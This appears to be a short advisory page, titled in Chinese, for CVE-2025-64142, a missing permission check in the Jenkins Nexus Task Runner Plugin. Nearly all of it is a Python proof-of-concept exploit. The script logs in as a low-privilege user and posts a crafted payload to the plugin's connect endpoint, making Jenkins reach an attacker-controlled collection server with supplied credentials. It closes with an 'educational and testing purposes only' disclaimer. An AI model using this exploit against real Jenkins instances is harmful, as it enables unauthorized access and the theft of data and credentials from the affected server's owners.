Jenkins Nexus Task Runner Plugin 缺失权限检查漏洞 (CVE-2025-64142)

# CVE-2025-64142 PoC - Jenkins Nexus Task Runner Plugin Missing Permission Check # This PoC demonstrates how an attacker with Overall/Read permission can abuse the vulnerability import requests import json # Configuration JENKINS_URL = "http://target-jenkins-server:8080" ATTACKER_URL = "http://attacker-controlled-server:8000/collect" ATTACKER_CREDS = "username:password" # Authentication (requires Overall/Read permission) session = requests.Session() # Replace with actual credentials or use API token session.auth = ('low_privilege_user', 'password') # Construct malicious request to trigger HTTP connection payload = { "name": "nexus-task", "url": ATTACKER_URL, "credentials": ATTACKER_CREDS, "action": "connect" } # Send request through Jenkins API api_endpoint = f"{JENKINS_URL}/plugin/nexus-task-runner/connect" response = session.post(api_endpoint, json=payload) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text}") # Note: This PoC is for educational and testing purposes only